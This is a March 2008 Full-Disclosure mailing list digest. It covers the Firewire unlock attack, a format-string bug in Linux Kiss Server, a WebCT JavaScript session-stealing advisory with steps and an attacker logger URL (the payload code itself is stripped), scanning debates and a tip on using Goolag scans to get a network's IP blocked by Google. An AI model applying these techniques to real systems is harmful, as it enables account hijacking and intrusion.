password needed In-Reply-To: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> Message-ID: <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> 2008/3/4, Ivan . : > http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html > Here is a (totally unofficial) mirror of Metlstorm's files in case you can't reach his overloaded website :-\ http://www.hotsecuritynews.com/fearwire/ Again, very nice work Metlstorm ! From steven at securityzone.org Tue Mar 4 23:41:39 2008 From: steven at securityzone.org (Steven Adair) Date: Tue, 4 Mar 2008 18:41:39 -0500 (EST) Subject: [Full-disclosure] Hack into a Windows PC - no password needed In-Reply-To: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> Message-ID: <4160.65.88.218.157.1204674099.squirrel@slashmail.org> I guess the release of this tool makes physical access pen-tests a little bit easier huh? Will have to try this out some time. Steven > http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From dancho.danchev at gmail.com Tue Mar 4 15:52:58 2008 From: dancho.danchev at gmail.com (Dancho Danchev) Date: Tue, 4 Mar 2008 07:52:58 -0800 Subject: [Full-disclosure] ZDNet Asia and TorrentReactor IFRAME-ed Message-ID: An in-depth overview of a currently active malware IFRAME campaign, that's targeting ZDNet Asia and TorrentReactor's search engine optimization practices of generating, and locally caching the search queries pages, thereby positioning the now cached popular keywords with the IFRAME between the first ten to twenty search results, taking advantage of the sites' high page ranks. The current state of the exploitation technique used, allows the malicious parties to basically inject as many, and as diverse keywords, presumebly taking advantage of today's world events. Sample redirects, lead me to known Russian Business Network netblocks and ex-customers in the face of rogue anti-virus and any-spyware applications, as well as fake codecs. http://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html Regards -- Dancho Danchev Cyber Threats Analyst/Blogger http://ddanchev.blogspot.com http://windowsecurity.com/Dancho_Danchev From Larry at larryseltzer.com Wed Mar 5 00:00:33 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Tue, 4 Mar 2008 19:00:33 -0500 Subject: [Full-disclosure] Hack into a Windows PC - no password needed In-Reply-To: <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> The key to the vulnerability: "To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine. The machine is then tricked into allowing the attacking computer to have read and write access to its memory. " I assume this makes it a local login, not a domain login. "Paul Ducklin, head of technology for security firm Sophos, said the security hole found by Boileau was not a vulnerability or bug in the traditional sense, because the ability to use the Firewire port to access a computer's memory was actually a feature of Firewire." So does the same capability exist on Macs? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com From worriedsecurity at googlemail.com Wed Mar 5 02:13:00 2008 From: worriedsecurity at googlemail.com (worried security) Date: Wed, 5 Mar 2008 02:13:00 +0000 Subject: [Full-disclosure] us cyber command In-Reply-To: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com> References: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com> Message-ID: <67ea64530803041813sc0f1027vfc6cbcd9ad588c22@mail.gmail.com> On Mon, Mar 3, 2008 at 2:31 PM, worried security wrote: > [02:40] do you think cyber terrorism is real or its just the > government softening ppl up for a couple of false flags for a reason > to bomb iran? > [02:49] the u.s are still deciding where to build the cyber > command, so don't expect any die hard style false flags till 2009 > [02:50] they said their false flag cyber command would be up > and running by december 2008 > [02:50] so they will test out their capabilities probably 2009/10 > Mar 03 22:50:50 bunch of skript kiddos with DDoS nets... this is why ppl will stop posting vulnerabilities to mailing lists, so the enemy can't use it against their countries Mar 03 22:51:10 huh? Mar 03 22:53:22 for instance do you think UK/china/iran hackers are going to keep posting to mailing lists vulnerabilties jsut so the script kids at the US cyber command can copy and paste the code to black out our electricity grids etc? Mar 03 22:53:25 http://www.ktbs.com/news/Ad-promote-Cyber-command-9337/ Mar 03 22:54:00 we will stop feeding the mailing lists the "cyber ammo" so the us cyber command can't attack our countries Mar 03 22:55:25 the us cyber command are advertising a cyber war on news articles, but do they realise what will happen if their is a cyber war? no will will post to the mailing lists anymore. Mar 03 22:55:55 the us government are the biggest dumb asses who dont think things through Mar 03 22:56:24 it will stop new techniques getting publically disclosed etc Mar 03 22:56:44 because nonUS hackers dont want to give the US gov ideas on how to hack non US countries Mar 03 22:57:07 we're already in a cyber war. Mar 03 22:57:23 so i hope the fucking us gov cyber command have good security researchers to find their own vulns and techniques Mar 03 22:57:49 cos their enemies wont post on the mailign lsits if cities start getting blacked out by US gov Mar 03 22:59:07 they do. Mar 03 22:59:18 oh have they hired hd moore? Mar 03 23:00:13 trust me the us gov rely on whats post to the mailing lsits as much as everyone else Mar 03 23:00:31 we are in a cyber war? sheeeesh last night we were in a trojan war Mar 03 23:00:35 and if they start attacking other nations when the cyber command is built Mar 03 23:00:49 then non-us hackers will stop posting to mailing lsits Mar 03 23:01:06 then the whole security community will fuck up Mar 03 23:01:23 the cyber command is nothing new. Mar 03 23:01:31 it is Mar 03 23:01:34 It is just a structural reorganization. Mar 03 23:01:41 its more than that Mar 03 23:01:55 this is about attacking nations Mar 03 23:01:59 you actually think that everything they are advertising isn't going on already? Mar 03 23:02:31 not on a big a scale as their planning Mar 03 23:02:53 60,000+ cyber command staff in a purpose built cyber battle center Mar 03 23:03:53 these dorks will bring the end to the security community as we know it the dumb asses Mar 03 23:04:17 nothing will get publically disclosed if real cyber war breaks out Mar 03 23:06:06 it's not going to be as big as you think. Mar 03 23:06:24 It's going to put a lot of existing jobs and stations under a central command. Mar 03 23:07:20 a strategic command? Mar 03 23:07:57 yes.. US Strategic Command will be in the mix somewhere. Mar 03 23:15:50 how many real hackers out of the hundreds of script kids will they hire Mar 03 23:16:13 there aint that many "elite" hackers out there Mar 03 23:16:28 that's where defense contractors come in. Mar 03 23:20:24 what do you mean Mar 03 23:23:00 a lot of talent consults for the government. Mar 03 23:23:30 a chinese defence contractor is going to give hackers to us so the us can black out chinese infrastructure when us get angry with china? Mar 03 23:24:11 there are plenty of chinese foreign nationals working for the US government. Mar 03 23:29:36 I'm off to bed. Goodnight. From eric at rachner.us Wed Mar 5 02:13:10 2008 From: eric at rachner.us (Eric Rachner) Date: Tue, 4 Mar 2008 18:13:10 -0800 Subject: [Full-disclosure] Hack into a Windows PC - no password needed In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> Message-ID: <003301c87e66$77981a40$66c84ec0$@us> Actually, it's full system compromise -- if the machine is joined to a domain, then any domain account credentials known to that machine are compromised as well. And yes, the same capability exists not only on Macs but on any computer that implements the Firewire specification. (details at http://storm.net.nz/projects/16) - Eric -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Larry Seltzer Sent: Tuesday, March 04, 2008 4:01 PM To: Untitled Subject: Re: [Full-disclosure] Hack into a Windows PC - no password needed The key to the vulnerability: "To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine. The machine is then tricked into allowing the attacking computer to have read and write access to its memory. " I assume this makes it a local login, not a domain login. "Paul Ducklin, head of technology for security firm Sophos, said the security hole found by Boileau was not a vulnerability or bug in the traditional sense, because the ability to use the Firewire port to access a computer's memory was actually a feature of Firewire." So does the same capability exist on Macs? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: winmail.dat Type: application/ms-tnef Size: 2950 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080304/311d35ac/attachment.bin From eric at rachner.us Wed Mar 5 02:15:13 2008 From: eric at rachner.us (Eric Rachner) Date: Tue, 4 Mar 2008 18:15:13 -0800 Subject: [Full-disclosure] Hack into a Windows PC - no password needed In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> Message-ID: <003701c87e66$c0e13dd0$42a3b970$@us> Actually, it's full system compromise -- if the machine is joined to a domain, then any domain account credentials known to that machine are compromised as well. And yes, the same capability exists not only on Macs but on any computer that implements the Firewire specification. (details at http://storm.net.nz/projects/16) - Eric -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Larry Seltzer Sent: Tuesday, March 04, 2008 4:01 PM To: Untitled Subject: Re: [Full-disclosure] Hack into a Windows PC - no password needed The key to the vulnerability: "To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine. The machine is then tricked into allowing the attacking computer to have read and write access to its memory. " I assume this makes it a local login, not a domain login. "Paul Ducklin, head of technology for security firm Sophos, said the security hole found by Boileau was not a vulnerability or bug in the traditional sense, because the ability to use the Firewire port to access a computer's memory was actually a feature of Firewire." So does the same capability exist on Macs? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: winmail.dat Type: application/ms-tnef Size: 2950 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080304/4e160f89/attachment.bin From Valdis.Kletnieks at vt.edu Wed Mar 5 02:38:34 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 04 Mar 2008 21:38:34 -0500 Subject: [Full-disclosure] Hack into a Windows PC - no password needed In-Reply-To: Your message of "Tue, 04 Mar 2008 19:00:33 EST." <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> Message-ID: <10008.1204684714@turing-police.cc.vt.edu> On Tue, 04 Mar 2008 19:00:33 EST, Larry Seltzer said: > So does the same capability exist on Macs? What, don't you remember? :) Google for the phrase "Owned by an iPod"... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080304/d67cf955/attachment.bin From vashnukad at vashnukad.com Wed Mar 5 03:43:25 2008 From: vashnukad at vashnukad.com (vashnukad) Date: Tue, 4 Mar 2008 22:43:25 -0500 Subject: [Full-disclosure] Vulnerability in Linux Kiss Server v1.2 Message-ID: From: vashnukad at vashnukad.com Site: http://www.vashnukad.com Application: Linux Kiss Server v1.2 Type: Format strings Priority: Medium Patch available: No The Linux Kiss Server contains a format strings vulnerability that, if run in foreground mode, can be leveraged for access. The vulnerability is demonstrated in the code below: Function log_message(): if(background_mode == 0) { if(type == 'l') fprintf(stdout,log_msg); if(type == 'e') fprintf(stderr,log_msg); free(log_msg); } Function kiss_parse_cmd(): /* check full command name */ if (strncmp(cmd, buf, cmd_len)) { asprintf(&log_msg,"unknow command: `%s'", buf); log_message(log_msg,'e'); goto error; } buf += cmd_len; So putting something like %n%n%n in 'buf' you can trigger the vulnerability. -- Name: Vashnukad E-mail: vashnukad at vashnukad.com Site: http://www.vashnukad.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080304/6f14a523/attachment.html From slythers at gmail.com Wed Mar 5 04:43:58 2008 From: slythers at gmail.com (Slythers Bro) Date: Wed, 5 Mar 2008 05:43:58 +0100 Subject: [Full-disclosure] us cyber command In-Reply-To: <67ea64530803041813sc0f1027vfc6cbcd9ad588c22@mail.gmail.com> References: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com> <67ea64530803041813sc0f1027vfc6cbcd9ad588c22@mail.gmail.com> Message-ID: <8f6a58a30803042043k5cb30bd8h4a521ccf207dcb64@mail.gmail.com> Mar 03 23:00:49 then non-us hackers will stop posting to mailing lsits you will stop posting php include exploit ? -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/1c268b74/attachment.html From redhowlingwolves at nc.rr.com Wed Mar 5 05:33:13 2008 From: redhowlingwolves at nc.rr.com (scott) Date: Wed, 05 Mar 2008 00:33:13 -0500 Subject: [Full-disclosure] us cyber command In-Reply-To: <67ea64530803041813sc0f1027vfc6cbcd9ad588c22@mail.gmail.com> References: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com> <67ea64530803041813sc0f1027vfc6cbcd9ad588c22@mail.gmail.com> Message-ID: <47CE3099.6070403@nc.rr.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 worried security wrote: > On Mon, Mar 3, 2008 at 2:31 PM, worried security > wrote: >> [02:40] do you think cyber terrorism is real or its just the >> government softening ppl up for a couple of false flags for a reason >> to bomb iran? >> [02:49] the u.s are still deciding where to build the cyber >> command, so don't expect any die hard style false flags till 2009 >> [02:50] they said their false flag cyber command would be up >> and running by december 2008 >> [02:50] so they will test out their capabilities probably 2009/10 >> > > Mar 03 22:50:50 bunch of skript kiddos with DDoS nets... > this is why ppl will stop posting vulnerabilities to mailing lists, so > the enemy can't use it against their countries > Mar 03 22:51:10 huh? > Mar 03 22:53:22 for instance do you think UK/china/iran > hackers are going to keep posting to mailing lists vulnerabilties jsut > so the script kids at the US cyber command can copy and paste the code > to black out our electricity grids etc? > Mar 03 22:53:25 > http://www.ktbs.com/news/Ad-promote-Cyber-command-9337/ > Mar 03 22:54:00 we will stop feeding the mailing lists the > "cyber ammo" so the us cyber command can't attack our countries > Mar 03 22:55:25 the us cyber command are advertising a cyber > war on news articles, but do they realise what will happen if their is > a cyber war? no will will post to the mailing lists anymore. > Mar 03 22:55:55 the us government are the biggest dumb asses > who dont think things through > Mar 03 22:56:24 it will stop new techniques getting > publically disclosed etc > Mar 03 22:56:44 because nonUS hackers dont want to give the > US gov ideas on how to hack non US countries > Mar 03 22:57:07 we're already in a cyber war. > Mar 03 22:57:23 so i hope the fucking us gov cyber command > have good security researchers to find their own vulns and techniques > Mar 03 22:57:49 cos their enemies wont post on the mailign > lsits if cities start getting blacked out by US gov > Mar 03 22:59:07 they do. > Mar 03 22:59:18 oh have they hired hd moore? > Mar 03 23:00:13 trust me the us gov rely on whats post to > the mailing lsits as much as everyone else > Mar 03 23:00:31 we are in a cyber war? sheeeesh last night > we were in a trojan war > Mar 03 23:00:35 and if they start attacking other nations > when the cyber command is built > Mar 03 23:00:49 then non-us hackers will stop posting > to mailing lsits > Mar 03 23:01:06 then the whole security community will fuck up > Mar 03 23:01:23 the cyber command is nothing new. > Mar 03 23:01:31 it is > Mar 03 23:01:34 It is just a structural reorganization. > Mar 03 23:01:41 its more than that > Mar 03 23:01:55 this is about attacking nations > Mar 03 23:01:59 you actually think that everything they are > advertising isn't going on already? > Mar 03 23:02:31 not on a big a scale as their planning > Mar 03 23:02:53 60,000+ cyber command staff in a purpose > built cyber battle center > Mar 03 23:03:53 these dorks will bring the end to the > security community as we know it the dumb asses > Mar 03 23:04:17 nothing will get publically disclosed if > real cyber war breaks out > Mar 03 23:06:06 it's not going to be as big as you think. > Mar 03 23:06:24 It's going to put a lot of existing jobs and > stations under a central command. > Mar 03 23:07:20 a strategic command? > Mar 03 23:07:57 yes.. US Strategic Command will be in the mix somewhere. > Mar 03 23:15:50 how many real hackers out of the hundreds of > script kids will they hire > Mar 03 23:16:13 there aint that many "elite" hackers out there > Mar 03 23:16:28 that's where defense contractors come in. > Mar 03 23:20:24 what do you mean > Mar 03 23:23:00 a lot of talent consults for the government. > Mar 03 23:23:30 a chinese defence contractor is going to > give hackers to us so the us can black out chinese infrastructure when > us get angry with china? > Mar 03 23:24:11 there are plenty of chinese foreign nationals > working for the US government. > Mar 03 23:29:36 I'm off to bed. Goodnight. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > I just want to know, since you are (supposedly) an informant to all the US gov domains, how you don't have a clue as to the capabilities of any country with hackers, disassemblers and people in general that strive to find vulnerabilities in software? Same sh*t, same 'King of Ridiculous'. What do you know about finding vulnerabilities, by the way? Yeah, I ended my sentence with a preposition. Regards, Scott -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzjCZs+9h2X0fCGcRAlsQAJ4jzBdQnixeNmONMsWNZLbwZvxnWwCfbzHw Vk4iRfmmuf81XF0Ux8iKZzQ= =3xcU -----END PGP SIGNATURE----- From mikie.simpson at gmail.com Wed Mar 5 09:18:16 2008 From: mikie.simpson at gmail.com (Michael Simpson) Date: Wed, 5 Mar 2008 09:18:16 +0000 Subject: [Full-disclosure] lets go vishing In-Reply-To: <47CDA1A2.14414.1BA737E@stuart.cyberdelix.net> References: <47CDA1A2.14414.1BA737E@stuart.cyberdelix.net> Message-ID: <82abd3a70803050118n548f4e1dhd834da3230a31f0@mail.gmail.com> On 3/4/08, lsi wrote: > [19:15] lsi2lsi: hiya! ... so i was nearly vished today ... > [19:16] lsi2lsi: mobile rings - hello, we're calling from Lloyds TSB, /schnip --from whocallsme.com I have contacted Adeptra (note spelling) to ask them if they are the owners of this number. However, if they have themselves sold the number on to yet another party, I have asked for the details so we can hunt down who is running this scam. Adeptra are based at Forbury Court, 12 Forbury Road, Reading, Berkshire, RG1 1SB Main telephone number is 0118 938 7000 (so I guess Miss Roberts is a direct number (938 7023) at that address). their website is www.adeptra.com have phun mike From balupton at gmail.com Wed Mar 5 12:08:48 2008 From: balupton at gmail.com (Benjamin 'balupton' Lupton) Date: Wed, 5 Mar 2008 21:08:48 +0900 Subject: [Full-disclosure] WebCT 4.x Javascript Session Stealer Exploits Message-ID: <01df01c87eb9$b5fdae50$21f90af0$@com> WebCT 4.x Javascript Session Stealer Exploits Software: WebCT Campus Edition 4.x (http://secunia.com/product/3280/) Affected Version: 4.1.5.8 Discoverer: Benjamin "balupton" Lupton Date Discovered: November 2005 Date Reported: 25/06/2007 Software Author Contacted (again) on: 20/07/2007 Date Published: 05/03/2008 Published At: http://www.balupton.com/blogs/dev?title=webct_session_stealer_exploit http://www.balupton.com/documents/webct_exploits.txt Attack Type: Javascript Session Stealer Exploit. Description: Mail & Discussion Board messages are not properly checked for javascript, allowing javascript to perform a session stealing attack (allowing the attacker to be logged in as the victim). Tested On: Attacks were tested fully on eCentral TAFE's WebCT System in November 2005 (with permission of staff), and again on Curtin University's WebCT System in June 2006 (but this time only to see if the javascript will run). Action Taken: Contacted TAFE lecturers and administrators, who didn't really care. Contacted WestOne multiple times, but never recieved any response. Then contacted Secunia, which would not publish as the discoverer did not own their own copy of the software in question. Published as WebCT is being phased out, with Blackboard being the replacement. Steps: The attacker publishes the exploit code in a message with "Don't wrap text" enabled. The victim accesses the attacker's message and their cookies are sent to the attacker's remote logger. The attacker then logs into the system and replaces his/her cookies with the acquired cookies. - Cookies are formatted as follows within the "value" attribute: CookieName=CookieValue; NextCookieName=NextCookieValue; The attacker is now logged into the system as the victim. In this case the logger is located here: http://www.balupton.com/sandbox/logger.php?pass_code=secret_key Notes: Victims must be students (attack does not work on non students, eg. teachers/admins). Attack 2 will also run in Opera, but fails to retrieve the document.cookie value. Attack 2 uses a base64 encoded javascript which is executed. Both attacks can be customized to allow any javascript to run. Javascript can also be developed to post a mail or discussion board message, this works for all types of victims. Resources: Attack Code: See below Logger: http://localhost.balupton.com/sandbox/logger.php?pass_code=secret_key&show_s ource=true Base64 Decoder / Encoder: http://www.balupton.com/sandbox/base64.php Cookie Editor: Firefox - http://editcookies.mozdev.org/ , Opera - Built In Attack 1 - IE6SP2 Exploit (Automatic):

Thank you

Attack 2 - Firefox Exploit (Manual): Click Me! Attack 2 - Firefox Exploit (Manual) - Decoded: From gluttony at gmail.com Wed Mar 5 12:54:16 2008 From: gluttony at gmail.com (Andrew A) Date: Wed, 5 Mar 2008 04:54:16 -0800 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! In-Reply-To: <20080304085355.GA19264@suse.de> References: <20080304085355.GA19264@suse.de> Message-ID: <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> hey dude, how is merely sending a single datagram not going to be faster than doing an entire handshake? On Tue, Mar 4, 2008 at 12:53 AM, Sebastian Krahmer wrote: > This is not true. I doubt there is any measurable advantage > of UDP vs. TCP scans if you do it right. > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/b494bc0d/attachment.html From security.research.labs at gmail.com Wed Mar 5 13:15:55 2008 From: security.research.labs at gmail.com (Dmitry) Date: Wed, 5 Mar 2008 15:15:55 +0200 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! In-Reply-To: <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> Message-ID: dude, you don't need the entire handshake for tcp scanning. On Wed, Mar 5, 2008 at 2:54 PM, Andrew A wrote: > hey dude, how is merely sending a single datagram not going to be faster > than doing an entire handshake? > > On Tue, Mar 4, 2008 at 12:53 AM, Sebastian Krahmer > wrote: > > > This is not true. I doubt there is any measurable advantage > > of UDP vs. TCP scans if you do it right. > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/00700442/attachment.html From krahmer at suse.de Wed Mar 5 13:21:01 2008 From: krahmer at suse.de (Sebastian Krahmer) Date: Wed, 5 Mar 2008 14:21:01 +0100 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! In-Reply-To: <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> Message-ID: <20080305132101.GA19179@suse.de> Hi dude, On Wed, Mar 05, 2008 at 04:54:16AM -0800, Andrew A wrote: > hey dude, how is merely sending a single datagram not going to be faster > than doing an entire handshake? First, to know whether a TCP port is open you do not need a complete handshake. A single TCP packet is enough. I doubt that a single TCP packet is slower than a single UDP packet. Second you may need to send multiple (same) UDP packets since remote peer's rate limiting does not send you back ICMPs; all due to the unreliable nature of UDP. But the most important thing is, that if you do it large scale*, you have to wait for some sort of reply anyways, either TCP SYN|ACK or some application data. This time of "waiting" can be used to SYN/request yet another 10,000 hosts. Thus, how fast a scanner is does not depend on UDP or TCP, it depends on the upper protocols. Even complex protocols such as SSH can be spoken very quickly and only require a little more time (if at all) than walking a couple of SNMP OID's per host. 10,000+ hosts/s for a common application TCP protocol such as HTTP is easy. Do not bash me if a UDP app scan takes 10 minutes to succeed and I need 11, we talk about *differences* :-) * speaking about application level which needs some request/responses in both, UDP and TCP, cases regards, Sebastian -- ~ ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer at suse.de - SuSE Security Team ~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg) From erey at ernw.de Wed Mar 5 14:00:08 2008 From: erey at ernw.de (Enno Rey) Date: Wed, 5 Mar 2008 15:00:08 +0100 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! In-Reply-To: <20080305132101.GA19179@suse.de> References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> <20080305132101.GA19179@suse.de> Message-ID: <20080305140008.GF66241@ws23.ernw.de> Hi, > all due to the unreliable nature of UDP. > > But the most important thing is, that if you do it large scale*, > you have to wait for some sort of reply anyways, > either TCP SYN|ACK or some application data. This time of "waiting" > can be used to SYN/request yet another 10,000 hosts. > Thus, how fast a scanner is does not depend on UDP or TCP, > it depends on the upper protocols. it mainly depends on the implementation of the scanner. We did some large scale internet SNMP scanning some time ago [see http://www.ernw.de/content/e7/e181/e671/download690/ERNW_026_SNMP_HitB_Dubai_2007_ger.pdf] and used our own scanning tool [http://www.ernw.de/download/snmpattack.pl]. Within the different releases of the tool there were _big_ differences as for the scanning speed. thanks, Enno -- Enno Rey Check out www.troopers08.org! ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902 PGP FP 055F B3F3 FE9D 71DD C0D5 444E C611 033E 3296 1CC1 Handelsregister Heidelberg: HRB 7135 Geschaeftsfuehrer: Roland Fiege, Enno Rey From times at krr.org Wed Mar 5 14:46:25 2008 From: times at krr.org (Times Enemy) Date: Wed, 05 Mar 2008 07:46:25 -0700 Subject: [Full-disclosure] Goolag Perk and Annoyance Message-ID: <47CEB241.3020604@krr.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Greetings. I preface that this is not a discovery, but rather a simple observation. http://www.goolag.org I am finding that it takes only a few seconds for Google to block query requests, BY IP! With this in mind, Goolag Scanner is actually an effective annoyance tool against large networks. Simply conduct a Goolag Scan from a heavily populated network, with a couple hundred Dorks, and anyone who uses the same public IP address which was used for the Goolag Scan will have to go through an extra CAPTCHA step to finish their Google queries. If they use a Google toolbar of some sort, Google may not even offer them a CAPTCHA option to continue with the search query. Within "most" corporate networks, what effective methods can be used, from the network's perspective, to block mass Google queries? .te -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkfOskEACgkQVuM8PD1Unspb8QCbBLYgUYKvp7CxnlA3RhLo5ec9 +wAAn35WpzMIvnyaLT4qmho/0O8QbtNN =bYe4 -----END PGP SIGNATURE----- From sub at room641a.net Wed Mar 5 13:20:21 2008 From: sub at room641a.net (sub) Date: Wed, 5 Mar 2008 08:20:21 -0500 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! In-Reply-To: <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> Message-ID: <8805f1180803050520h4360a708j2b2122d05bfffc09@mail.gmail.com> That single UDP datagram is definitely faster. Compare the Code Red worm to Sapphire (SQL Slammer), for instance: "Previous scanning worms, such as Code Red, spread via many threads, each invoking connect() to probe random addresses. Thus each thread's scanning rate was limited by network latency, the time required to transmit a TCP-SYN packet and wait for a response or timeout. In principal, worms can compensate for this latency by invoking a sufficiently large number of threads. However, in practice, context switch overhead is significant and there are insufficient resources to create enough threads to counteract the network delays -- the worm quickly stalls and becomes latency limited. In contrast, Sapphire's scanner was limited by each compromised machine's bandwidth to the Internet. Since the SQL Server vulnerability was exploitable using a single packet to UDP port 1434, the worm was able to send these scans without requiring a response from the potential victim." * http://www.caida.org/publications/papers/2003/sapphire/sapphire.html (Oops, sorry for the copy to your inbox, Andrew.) On 3/5/08, Andrew A wrote: > hey dude, how is merely sending a single datagram not going to be faster > than doing an entire handshake? > > On Tue, Mar 4, 2008 at 12:53 AM, Sebastian Krahmer wrote: > > > This is not true. I doubt there is any measurable advantage > > of UDP vs. TCP scans if you do it right. > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From research at sec-consult.com Wed Mar 5 15:53:36 2008 From: research at sec-consult.com (Bernhard Mueller) Date: Wed, 5 Mar 2008 15:53:36 +0000 Subject: [Full-disclosure] Firewire Attack on Windows Vista Message-ID: <1204732416.6997.53.camel@b4byl0n> Hello, In the light of recent discussions about firewire / DMA hacks, we would like to throw in some of the results of our past research on this topic (done mainly by Peter Panholzer) in the form of a short whitepaper. In this paper, we demonstrate that the firewire unlock attack (as implemented in Adam Boileau?s winlockpwn) can be used against Windows Vista. The paper is available at: http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf Best regards, Bernhard -- _________________________________________ 